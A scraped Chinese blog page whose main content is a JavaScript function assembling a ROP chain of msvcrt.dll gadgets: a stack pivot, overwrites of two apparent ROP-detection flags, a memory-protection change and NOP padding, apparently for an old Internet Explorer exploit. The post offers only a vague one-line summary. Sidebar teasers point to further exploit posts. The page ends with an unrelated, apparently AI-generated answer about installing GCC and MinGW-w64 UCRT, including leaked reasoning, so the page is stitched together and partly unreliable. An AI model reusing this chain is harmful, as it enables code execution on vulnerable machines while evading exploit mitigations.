MSVCRT:ROP - CN 修改ROP检测标志

最新推荐文章于 2019-08-02 16:31:01 发布
原创 最新推荐文章于 2019-08-02 16:31:01 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了一个复杂的函数内部结构,通过一系列特定的指令序列展示了函数的工作原理。通过对不同指令的组合使用,揭示了函数如何实现其功能,并重点介绍了关键指令的作用。 



 function getddd()
	{
	var kkkkk = unescape("\u0433\u77bf");
	kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn
	
	kkkkk += unescape("\uf519\u77be")////pop ecx,retn
	kkkkk += unescape("\u9ef8\u1009")////10099EF8 check flag 1
	kkkkk += unescape("\uc047\u77be")//77BEC047 //MOV DWORD PTR DS:[ECX],EAX  MOV EAX,ESI  POP EDI  POP ESI POP EBP RETN


	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	
	kkkkk += unescape("\uf519\u77be")////pop ecx,retn
	kkkkk += unescape("\u9ed0\u1009")////10099Ed0 check flag 2
	kkkkk += unescape("\u1d16\u77bf")//pop eax,retn
	kkkkk += unescape("\u1d16\u77be")//fill
	kkkkk += unescape("\uc047\u77be")//77BEC047 //MOV DWORD PTR DS:[ECX],EAX  MOV EAX,ESI  POP EDI  POP ESI POP EBP RETN

	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\ubdf4\u77be")//pop ebp retn
	kkkkk += unescape("\ubdf4\u77be")//pop ebp retn
	kkkkk += unescape("\u3436\u77c2")//pop ebx retn
	kkkkk += unescape("\u9f92\u77c0")//retn
	kkkkk += unescape("\ucbf9\u77c1")//pop edx retn
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\ub1ad\u77c0")
	kkkkk += unescape("\ubdf4\u77be")
	kkkkk += unescape("\u7ae8\u77c1")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u80c1\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u67f0\u77c2")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\ubdf4\u77be")
	kkkkk += unescape("\ubdf4\u77be")
	kkkkk += unescape("\u3436\u77c2")
	kkkkk += unescape("\u406e\u883f")
	kkkkk += unescape("\u771c\u77c2")
	kkkkk += unescape("\u9f07\u77c2")
	kkkkk += unescape("\u5f07\u77c0")
	kkkkk += unescape("\u5f07\u77c0")
	kkkkk += unescape("\uded4\u77c1")
	kkkkk += unescape("\ucf92\u77c0")
	kkkkk += unescape("\u0c77\u77c2")
	kkkkk += unescape("\ub1ad\u77c0")
	kkkkk += unescape("\u05ac\u77c3")//oldprotect
	kkkkk += unescape("\u7ae8\u77c1")
	kkkkk += unescape("\u9f92\u77c0")
	kkkkk += unescape("\u80c1\u77c0")
	kkkkk += unescape("\uaacc\u77bf")
	kkkkk += unescape("\uded4\u77c1")
	kkkkk += unescape("\u1131\u77be")
	kkkkk += unescape("\u67f0\u77c2")
	kkkkk += unescape("\u1025\u77c2");
			
	kkkkk += unescape("\u9090\u9090");	
	
	kkkkk += unescape("\u9090\u9090");	
	return kkkkk;
}


22、黑客攻防:ROP与PowerShell的实战应用
Pepper的专栏
09-03 31
本文详细探讨了ROP攻击和PowerShell在黑客攻防中的实战应用。首先介绍了ROP攻击的基本原理和步骤,并结合实践展示了如何利用ROP绕过安全机制。随后,深入分析了PowerShell与Windows API结合的技术,包括Shellcode注入、LSASS内存转储以及绕过AV检测的方法。文章还总结了相关防御策略,强调了更新系统、启用安全机制、监控审计和员工培训的重要性。通过案例分析展示了攻击者如何综合利用ROP和PowerShell进行渗透,以及防御方的应对措施。最后,展望了未来网络安全攻防的发展趋势
浏览器漏洞利用实战
悦分享
10-04 403
C++对象的前4字节存放了指向虚表的指针,如果我们用指向Shellcode的值覆盖了这个指针,调用任何对象的虚函数都会最终执行我们的Shellcode。首先是DEP的绕过。在XP SP3的IE中可以利用msvcrt.dll的代码段来提供Gadget,同时,msvcrt.dll还是一个没有开启ASLR的模块,因此如果所有的ROP Gadget全部来自没有开启ASLR模块,那么既可以绕过DEP,又可以绕过ASLR(不要忘了在Windows 7的IE8上,该漏洞也能触发,Win7中是开启了ASLR的)。
Rop开发手册(3):最简单的服务开放平台框架
stamen的程序员之路
08-10 282
:D [quote]Rop项目文档前后写了一个多月,在写的过程中发现很多功能不完善的,又回过头了改项目,此种反复多次,现在Rop开源项目的文档已经差不多了,将陆续在iteye此发出,希望对大家有帮助。在Rop项目的开发过程中得到了众多iteye网友的有力帮助,收到了很多很好的整改的意见,在此对他们的奉献和帮助表示诚挚的感谢,这些网友包括但不限于: [url=http://melin.iteye...
数据结构.单链表(C语言实现)
宽简厚重—博约
10-16 1266
#include #include #include #define TRUE    1 #define FALSE    0 #define OK    1 #define ERROR    0 #define    INFEASIBLE    -1 #define    OVERFLOW    -2 #define  Elemtype int typedef  
在windbg中安装和使用mona
oatnehc的专栏
04-25 4849
1、安装mona 参照:http://blog.youkuaiyun.com/bugmeout/article/details/45199139 2、mona命令行 0:000> !load pykd.pyd 0:000> !py mona ** Warning, no symbol path set ! ** I'll set the symbol path to srv*c:\sy
逆向笔记【贰】
huhu2017的专栏
02-28 1626
一、PE文件各区段解释(区段名称跟功能没有必然关系,这里只是说明常见的定义): .code或.text段:存放程序的代码数据。.data段:存放程序运行使用的数据。.rdata或.idata段:程序的导入表数据。.edata段:程序的导出表所在的节。.rsrc段 :程序资源节,为多层的二叉排序树,节点指向PE文件的各种类型资源(图标、对话框、菜单等)。.reloc段:重定位表所在的节,当程序
ROP技术绕过DEP--MPlayer栈溢出漏洞
weixin_30251587的博客
06-02 593
一、前言 1.1 DEP介绍 数据执行保护 (DEP) 是一套软硬件技术,能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC Edition 2005...
ROP链绕过DEP
w_g3366的博客
08-02 2081
转载自ROP链绕过DEP 一、前言 1.1 DEP介绍 数据执行保护 (DEP) 是一套软硬件技术,能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC E...
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8591
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
Using Memory Management to Detect and Extract Illegitimate Code for Malware Analysis - Slides - 2012-计算机科学
04-22
61+0x12db[21.9.2012 12:11:24] [ 22] from 0x77c15ed6 msvcrt._pi_by_2_to_61+0x12dc[21.9.2012 12:11:24] ROP-RET ####################[21.9.2012 12:11:24] [ 22] to 0x77c29e29 msvcrt._aligned_offset_malloc+...
利用ROP链突破DEP保护机制
Puzzor的专栏
04-19 6840
@Puzzor          本文旨在介绍如何利用ROP绕过DEP保护机制,也是学习过程中的总结 DEP保护机制即Data Execution Prevention,其分为软件DEP以及硬件DEP,下面所讨论的都是基于硬件DEP下的绕过方式。相关术语请自行学习。 所用实例为一存在溢出漏洞的程序,当处理某些文件时未能检查文件长度的限制,导致栈区溢出,若不开启DEP保护,则溢出后E
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3860
Well-known DEP-violating thunks
爱杀之爪的矩阵
04-10 3694
这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时 竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可 执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了 多年的指令执行三观。 debug win7+system dep open Breakpoint 0 hit eax=2e81e
cve-2012-1876 win7_ie8_leak_shellcode code
爱杀之爪的矩阵
08-08 3289
alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0
cve2012-1876 leak mshtml base address and leak shellcode base address
爱杀之爪的矩阵
08-06 1416
leak mshtml base address  leak shellcode base address 其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003
没有ASLR的几个DLL
爱杀之爪的矩阵
06-22 1365
DpoFeedb.dll        指纹识别 现在买的笔记本都有 MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了 VBE7INTL.DLL    未找到加载方式 迅雷                 mcvcr71.dll java6                 mcvcr71.dll comct232.ocx      需要用户点一次允许 之后就不需要了 com
cve2012-1889 ie8 rop
爱杀之爪的矩阵
06-19 1295
采用inking 大牛的方法 function exploit() { obj = document.getElementById('oo').object; var src = unescape("%u0c0c%u0c0c"); while (src.length < 0x1002) src += src; src = "\\\\xxx" + src; src = src.subs
UCRT runtime GCC 15.1.0 (with POSIX threads) + MinGW-w64 13.0.0 UCRT - release 4 (LATEST) Win32 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive Win64 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive GCC 15.1.0 (with POSIX threads) + MinGW-w64 13.0.0 UCRT - release 2 Win32 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive Win64 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive GCC 15.1.0 (with POSIX threads) + MinGW-w64 12.0.0 UCRT - release 1 Win32 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive Win64 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive GCC 15.1.0 (with MCF threads) + MinGW-w64 12.0.0 UCRT - release 1 Win32 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive Win64 (without LLVM/Clang/LLD/LLDB): 7-Zip archive* | Zip archive推荐哪一个
最新发布
07-30
<think>我们正在讨论的是如何为Windows系统下载和配置GCC 15.1.0与MinGW-w64 13.0.0的UCRT版本。用户引用的内容中提到了从winlibs.com下载预编译的工具链,并且用户已经明确下载了一个特定的版本:winlibs-x86_64-posix-seh-gcc-15.1.0-mingw-w64ucrt-13.0.0-r2.zip。因此,我们将以此为基础进行说明。 ### 步骤1:下载预编译的MinGW-w64工具链(UCRT版本) 根据引用[1]和[3],我们推荐从[winlibs.com](https://winlibs.com/)下载预编译的工具链。具体到用户的需求: - **GCC版本**:15.1.0 - **MinGW-w64版本**:13.0.0(UCRT运行时) - **架构**:x86_64(64位) - **线程模型**:posix - **异常处理**:seh - **压缩格式**:Zip archive(用户已经下载了zip格式) 因此,我们推荐的下载文件名为: `winlibs-x86_64-posix-seh-gcc-15.1.0-mingw-w64ucrt-13.0.0-r2.zip` 你可以直接在[winlibs.com](https://winlibs.com/)的独立构建部分找到这个文件并下载。 ### 步骤2:解压文件 将下载的zip文件解压到一个合适的目录。注意: - 路径中不要包含空格和中文(避免潜在问题) - 推荐解压到根目录,例如:`C:\mingw64` ### 步骤3:设置环境变量 将MinGW-w64的`bin`目录添加到系统环境变量`PATH`中。具体步骤: 1. 打开系统设置(Win+I),搜索“环境变量”并打开。 2. 在“系统变量”中找到`Path`变量,点击“编辑”。 3. 点击“新建”,然后添加你的MinGW-w64的`bin`目录路径,例如:`C:\mingw64\bin`。 4. 点击“确定”保存所有更改。 ### 步骤4:验证安装 打开一个新的命令提示符(cmd)或PowerShell,输入以下命令验证: ```bash gcc --version g++ --version gdb --version ``` 如果正确显示版本信息(GCC 15.1.0,GDB等),则说明安装成功[^2][^3]。 ### 注意事项 - 如果你之前安装过其他版本的MinGW,请确保环境变量中只包含当前版本的路径,避免冲突。 - 如果遇到问题,请检查环境变量设置是否正确,并重新启动命令行窗口或计算机使设置生效。 ### 在VSCode中使用 在VSCode中配置C/C++环境时,需要确保在`tasks.json`和`launch.json`中正确指向这个工具链。在`c_cpp_properties.json`中,编译器路径应设置为: ```json "compilerPath": "C:/mingw64/bin/g++.exe" ``` (根据你的实际路径调整) 这样,VSCode的C/C++扩展就能正确使用这个工具链进行编译和调试。 ### 相关问题 1. 如何在VSCode中配置使用这个特定版本的MinGW-w64工具链? 2. 如何解决在配置过程中出现的“g++.exe: not found”错误? 3. 如何在同一台机器上管理多个版本的MinGW-w64工具链?</think>根据您的需求,以下是针对 Windows 系统推荐下载的 GCC 15.1.0 与 MinGW-w64 13.0.0 UCRT 版本,以及详细配置指南: --- ### 🔧 推荐下载版本 | 组件 | 版本 | 架构 | 运行时库 | 下载格式 | 推荐文件名称 | |--------------|------------|--------|----------|------------|--------------| | **GCC** | 15.1.0 | x86_64 | UCRT | Zip | `winlibs-x86_64-posix-seh-gcc-15.1.0-mingw-w64ucrt-13.0.0-r2.zip` | | **MinGW-w64**| 13.0.0 | x86_64 | UCRT | 7-Zip/Zip | 同上(捆绑包) | > 📌 **说明**:该捆绑包已包含完整的 UCRT 运行时支持,兼容 Windows 10/11 的现代 C 库标准,支持 C++23 标准[^1][^3]。 --- ### 📥 下载与安装步骤 1. **获取工具链** - 前往 [winlibs.com](https://winlibs.com/) 下载推荐文件 - 选择 **UCRT** 版本(非 MSVCRT) 2. **解压安装** ```powershell # 推荐解压路径(避免空格和中文) C:\mingw64 ``` > 使用 7-Zip 或系统自带解压工具,确保保留目录结构[^1] 3. **配置环境变量** - 系统属性 → 高级 → 环境变量 → 编辑 `Path` - 添加新条目:`C:\mingw64\bin` - 验证安装: ```bash gcc --version # 应显示 gcc 15.1.0 g++ --version # 应显示 g++ 15.1.0 ``` --- ### ⚙ VSCode 配置指南 1. **必需扩展** - [C/C++](https://marketplace.visualstudio.com/items?itemName=ms-vscode.cpptools) (Microsoft) - [C/C++ Extension Pack](https://marketplace.visualstudio.com/items?itemName=ms-vscode.cpptools-extension-pack) (包含 CMake 支持) 2. **编译器路径配置** (`c_cpp_properties.json`) ```json { "configurations": [ { "name": "Win64", "includePath": ["${workspaceFolder}/**"], "compilerPath": "C:/mingw64/bin/g++.exe", "cStandard": "c17", "cppStandard": "c++23", "intelliSenseMode": "windows-gcc-x64" } ], "version": 4 } ``` 3. **构建任务配置** (`tasks.json`) ```json { "version": "2.0.0", "tasks": [ { "label": "Build with UCRT", "type": "shell", "command": "g++", "args": [ "-fdiagnostics-color=always", "-g", "${file}", "-o", "${fileDirname}/${fileBasenameNoExtension}.exe" ], "group": "build" } ] } ``` --- ### 🔍 验证 UCRT 运行时 创建测试文件 `ucrt_test.cpp`: ```cpp #include <stdio.h> #include <uchar.h> // C11 宽字符支持 int main() { char16_t s[] = u"UCRT 测试"; // C++23 字符串字面量 printf("GCC 版本: %d.%d.%d\n", __GNUC__, __GNUC_MINOR__, __GNUC_PATCHLEVEL__); return 0; } ``` 使用快捷键 `Ctrl+Shift+B` 编译,应输出: ``` GCC 版本: 15.1.0 ``` --- ### ⚠ 注意事项 1. **路径冲突** 若曾安装其他 MinGW 版本,需彻底删除旧版环境变量 2. **防病毒软件** 首次运行时可能需允许 `gcc.exe` 和 `gdb.exe` 通过防火墙 3. **UCRT 优势** - 支持 Windows 10/11 的通用 C 运行时 - 更好的 Unicode 支持(UTF-8 代码页) - 兼容最新 C++23 标准特性[^3] --- ### ❓相关问题 1. 如何验证 MinGW-w64 是否使用了 UCRT 运行时? 2. 在 VSCode 中如何切换不同版本的 MinGW 工具链? 3. 使用 UCRT 版本编译的程序能否在旧版 Windows 运行? 4. 如何配置 CMake 优先选用 UCRT 工具链?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值